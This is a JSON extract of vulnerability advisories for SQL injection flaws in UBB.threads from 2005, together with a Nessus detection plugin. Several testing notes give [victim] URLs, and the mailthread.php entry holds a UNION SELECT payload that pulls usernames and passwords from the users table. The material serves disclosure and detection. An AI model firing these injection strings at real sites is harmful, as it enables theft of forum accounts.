Notes\nhttp://[victim]/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17532", "id": "OSVDB:17532", "title": "UBB.threads grabnext.php posted Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'calendar.php' script not properly sanitizing user-supplied input to the 'year' or 'month' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'calendar.php' script not properly sanitizing user-supplied input to the 'year' or 'month' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/calendar.php?Cat=7&month=6&year=2005[SQL]\nhttp://[victim]/calendar.php?Cat=&month=7[SQL]&year=2005\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17526", "id": "OSVDB:17526", "title": "UBB.threads calendar.php Multiple Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'mailthread.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'mailthread.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17528", "id": "OSVDB:17528", "title": "UBB.threads mailthread.php Number Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-03T12:30:20", "bulletinFamily": "scanner", "description": "The remote host is running a version of UBB.threads that suffers from\nmultiple vulnerabilities due to insufficient input validation - local\nfile inclusion, HTTP response splitting, SQL injection, and cross-site\nscripting. These flaws may allow an attacker to completely compromise\nthe affected installation of UBB.threads.", "modified": "2019-11-02T00:00:00", "id": "UBBTHREADS_PRINTTHREAD_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/18098", "published": "2005-04-20T00:00:00", "title": "UBB.threads < 6.5.2 beta Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security\n#\n# \n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18098);\n script_version(\"1.17\");\n\n script_cve_id(\n \"CVE-2005-1199\", \n \"CVE-2005-2057\",\n \"CVE-2005-2058\",\n \"CVE-2005-2059\",\n \"CVE-2005-2060\",\n \"CVE-2005-2061\"\n );\n script_bugtraq_id(13253, 14050, 14052, 14053, 14055);\n\n name[\"english\"] = \"UBB.threads < 6.5.2 beta Multiple Vulnerabilities\";\n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nnumerous vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of UBB.threads that suffers from\nmultiple vulnerabilities due to insufficient input validation - local\nfile inclusion, HTTP response splitting, SQL injection, and cross-site\nscripting. These flaws may allow an attacker to completely compromise\nthe affected installation of UBB.threads.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/396222\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.gulftech.org/?node=research&article_id=00084-06232005\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to UBB.threads 6.5.2 beta or greater.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/20\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/19\");\n\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for multiple vulnerabilities in UBB.threads < 6.5.2 beta\";\n script_summary(english:summary[\"english\"]);\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ubbthreads_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/ubbthreads\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/ubbthreads\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # 6.5.1.1 and below are vulnerable.\n if (safe_checks()) {\n if (ver =~ \"^([0-5]\\.|6\\.([0-4][^0-9]|5$|5\\.0|5\\.1(\\.1)?))\") {\n report = string(\n \"Note that Nessus has determined the vulnerability exists on the\\n\",\n \"remote host simply by looking at the version number of UBB.threads\\n\",\n \"installed there.\"\n );\n\n security_hole(port:port, extra:report);\n }\n }\n # Otherwise...\n else {\n # Get a list of existing boards on the target.\n r = http_send_recv3(method:\"GET\", item:string(dir, \"/ubbthreads.php\"), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # Loop through a couple of forums...\n i = 0;\n pat = dir + '/postlist.php\\\\?.*Board=([^\"&]+)\">';\n matches = egrep(pattern:pat, string:res, icase:TRUE);\n foreach match (split(matches)) {\n match = chomp(match);\n board = eregmatch(pattern:pat, string:match);\n if (isnull(board) || ++i > 5) break;\n\n # Try a simple exploit.\n board = board[1];\n r = http_send_recv3(method:\"GET\", port: port,\n item:string(\n dir, \"/printthread.php?\",\n \"Board=\", board, \"&\",\n \"type=post&\",\n # nb: this should just produce a syntax error.\n \"main='\", SCRIPT_NAME ));\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if we see a syntax error.\n if (egrep(string:res, pattern:string(\"SQL Error:.+ near '\", SCRIPT_NAME, \"'\"), icase:TRUE)) {\n security_hole(port);\n\tset_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n\tset_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}